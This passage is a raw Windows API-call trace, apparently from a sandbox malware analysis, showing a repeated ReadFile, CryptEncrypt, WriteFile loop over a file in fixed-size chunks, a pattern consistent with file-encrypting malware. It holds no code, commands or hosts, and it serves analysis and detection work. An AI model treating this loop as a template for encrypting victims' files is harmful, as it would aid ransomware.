lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.282] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.282] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.282] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.282] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.282] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.282] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.283] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.283] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.283] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.283] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.283] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.283] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.284] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.284] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.284] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.284] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.284] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.285] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.285] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.285] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.285] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.285] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.286] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.286] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.286] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.286] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.286] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.287] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.287] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.287] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.287] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.287] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.287] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.288] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.288] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.288] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.288] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.288] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.289] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.289] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.289] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.289] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.289] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.289] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.289] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 